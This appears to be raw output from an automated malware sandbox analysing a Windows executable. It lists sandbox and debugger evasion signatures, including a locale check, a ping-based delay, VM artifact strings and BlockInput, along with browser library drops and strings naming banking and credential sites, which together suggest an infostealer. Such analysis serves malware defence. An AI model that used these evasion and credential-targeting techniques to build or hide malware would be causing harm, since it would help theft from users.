Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Uses ping.exe to sleep
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 2.2.2.2 -n 1 -w 3000
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Memory allocated: 1050000 memory reserve | memory write watch
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Memory allocated: 2B80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Memory allocated: 29C0000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Thread delayed: delay time: 922337203685477
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif API coverage: 1.5 %
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe API coverage: 5.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif TID: 5892 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif TID: 5892 Thread sleep time: -34128s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe TID: 1720 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\hlyG1m5UmO.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 15_2_002C4005
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 15_2_002CC2FF
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C494A GetFileAttributesW,FindFirstFileW,FindClose, 15_2_002C494A
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CCD14 FindFirstFileW,FindClose, 15_2_002CCD14
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 15_2_002CCD9F
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 15_2_002CF5D8
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 15_2_002CF735
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 15_2_002CFA36
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 15_2_002C3CE2
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00439ED2 FindFirstFileExW, 15_2_00439ED2
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 16_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 16_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 16_2_00414910
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 16_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 16_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 16_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 16_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 16_2_00414570
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 16_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 16_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 16_2_00413EA0
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00275D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo, 15_2_00275D13
Source: C:\Users\user\AppData\LocalCGIDAAAKJJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\464151 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\464151\ Jump to behavior
Source: Amcache.hve.19.dr Binary or memory string: VMware
Source: BKFIJJEG.16.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BKFIJJEG.16.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: BKFIJJEG.16.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.19.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Blank.pif, 0000000F.00000002.3346669929.000000000153F000.00000004.00000020.00020000.00000000.sdmp, Blank.pif, 0000000F.00000002.3346669929.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3347473837.0000000000709000.00000004.00000020.00020000.00000000.sdmp, 1248.tmp.exe, 00000010.00000002.3347473837.000000000073C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: BKFIJJEG.16.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.19.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: BKFIJJEG.16.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 1248.tmp.exe, 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware(
Source: Amcache.hve.19.dr Binary or memory string: vmci.sys
Source: BKFIJJEG.16.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: BKFIJJEG.16.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: BKFIJJEG.16.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BKFIJJEG.16.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BKFIJJEG.16.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.19.dr Binary or memory string: VMware20,1
Source: Amcache.hve.19.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.19.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 1248.tmp.exe, 00000010.00000002.3347473837.00000000006DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: BKFIJJEG.16.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.19.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.19.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.19.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Blank.pif, 0000000F.00000002.3346669929.00000000014FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: Amcache.hve.19.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.19.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: BKFIJJEG.16.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: BKFIJJEG.16.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.19.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: BKFIJJEG.16.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.19.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.19.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.19.dr Binary or memory string: VMware, Inc.
Source: BKFIJJEG.16.dr Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.19.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.19.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.19.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: BKFIJJEG.16.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.19.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BKFIJJEG.16.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: BKFIJJEG.16.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BKFIJJEG.16.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: BKFIJJEG.16.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.19.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: BKFIJJEG.16.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BKFIJJEG.16.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BKFIJJEG.16.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.19.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Blank.pif, 0000000F.00000002.3346669929.000000000153F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW#
Source: LocalCGIDAAAKJJ.exe, 0000002B.00000002.3338128212.0000000000E12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: BKFIJJEG.16.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BKFIJJEG.16.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BKFIJJEG.16.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BKFIJJEG.16.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.19.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.19.dr Binary or memory string: vmci.syshbin`
Source: BKFIJJEG.16.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.19.dr Binary or memory string: \driver\vmci,\driver\pci
Source: BKFIJJEG.16.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.19.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BKFIJJEG.16.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.19.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: BKFIJJEG.16.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Process queried: DebugPort Jump to behavior
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_002D45D5 BlockInput, 15_2_002D45D5
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00288E89 _memset,IsDebuggerPresent, 15_2_00288E89
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Local\Temp\464151\Blank.pif Code function: 15_2_00295CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 15_2_00295CAC
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\AppData\Local\Temp\1248.tmp.exe Code function: 16_2_004045C0 VirtualProtect ?,00000004,00000100,00000000 16_2_004045C0
Contains functionality to dynamically determine API calls
